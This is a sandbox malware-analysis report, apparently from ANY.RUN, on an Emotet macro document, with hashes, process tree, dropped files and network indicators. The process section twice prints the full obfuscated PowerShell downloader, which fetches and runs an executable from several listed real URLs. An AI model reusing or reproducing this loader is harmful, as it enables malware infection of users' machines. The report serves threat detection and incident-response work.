analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

EMOTET.doc

Full analysis: https://app.any.run/tasks/12299ab1-a5d0-4f57-a80d-45ec4e6f94da
Verdict: Malicious activity
Analysis date: January 17, 2020, 14:50:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: ViHzifOp, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 14 06:34:00 2017, Last Saved Time/Date: Thu Dec 14 06:34:00 2017, Number of Pages: 1, Number of Words: 1, Number of Characters: 11, Security: 0
MD5:

E8D9EB977EC98E7616AC0A358D1A44B3

SHA1:

F9B475CFF7F059645C511FFB0D5335DB81FE590A

SHA256:

C52F09E474C5D9B316E0B8E5E839282E52268A79B03BEF1CEFAAEE4C2CEC793E

SSDEEP:

3072:a6WCv4rz7hnxKaCvT8SVlcP1nyfGfHm7cXSwQ3T6iveFgBuJWz:4z9EjlVmP1c0JQ3NsJ4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1096)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3796)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1096)
    • Changes settings of System certificates

      • powershell.exe (PID: 896)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 896)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1096)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: ViHzifOp
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2017:12:14 06:34:00
ModifyDate: 2017:12:14 06:34:00
Pages: 1
Words: 1
Characters: 11
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 11
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1096"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EMOTET.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3796cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %TVTEimDaQlaTNit%=hqpCiruvT&&set %TQzjKjbpTs%=o^we^r^s&&set %LlcncNiALWEzjzz%=NLjbwkQEoIotK&&set %ntSiPjinh%=p&&set %wbaYkWAbmnYwSCH%=pNzrqJUjLTWbVXw&&set %TTjVYaz%=^he^l^l&&set %UYkqNvdbzcwSaYK%=fdiIPbKwDBiuPEN&&!%ntSiPjinh%!!%TQzjKjbpTs%!!%TTjVYaz%! "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . ( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
896powershell "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . ( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 819
Read events
1 060
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
1096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB214.tmp.cvr
MD5:
SHA256:
896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TCSKOEAMQOJHM56FP1F3.temp
MD5:
SHA256:
896powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A2ECA083537A02B6158458FF1752C63Fbinary
MD5:B92B932DB9511C477EA3B7FD00731C00
SHA256:6CDA4C84B5EB93A9C4A603DDEF0415E5B76CAB78F6756D286F796D98370B10FF
896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39bf72.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1096WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:71834CB5A40FD067717E5E242FCFDDE2
SHA256:053F9EECE736E49AA9E3C99DB635C70D83D2B9311D2D3CA8D612695DCF73376C
1096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$EMOTET.docpgc
MD5:77062AD3919613D252BBDA640BCF8E67
SHA256:527B246D794ACF52454FC292293578EA8675DE33257846A9D35EDDFA9294DEF7
896powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A2ECA083537A02B6158458FF1752C63Fder
MD5:B15409274F54AD8F023D3B85A5ECEC5D
SHA256:25847D668EB4F04FDD40B12B6B0740C567DA7D024308EB6C2C96FE41D9DE218D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
896
powershell.exe
34.208.67.28:443
www.mivaso.cl
Amazon.com, Inc.
US
suspicious
896
powershell.exe
2.19.43.67:80
cert.int-x3.letsencrypt.org
Akamai International B.V.
unknown
896
powershell.exe
34.208.67.28:80
www.mivaso.cl
Amazon.com, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
www.zavierdesign.com
malicious
www.mivaso.cl
  • 34.208.67.28
whitelisted
cert.int-x3.letsencrypt.org
  • 2.19.43.67
whitelisted
mivaso.cl
  • 34.208.67.28
malicious

Threats

No threats detected
No debug info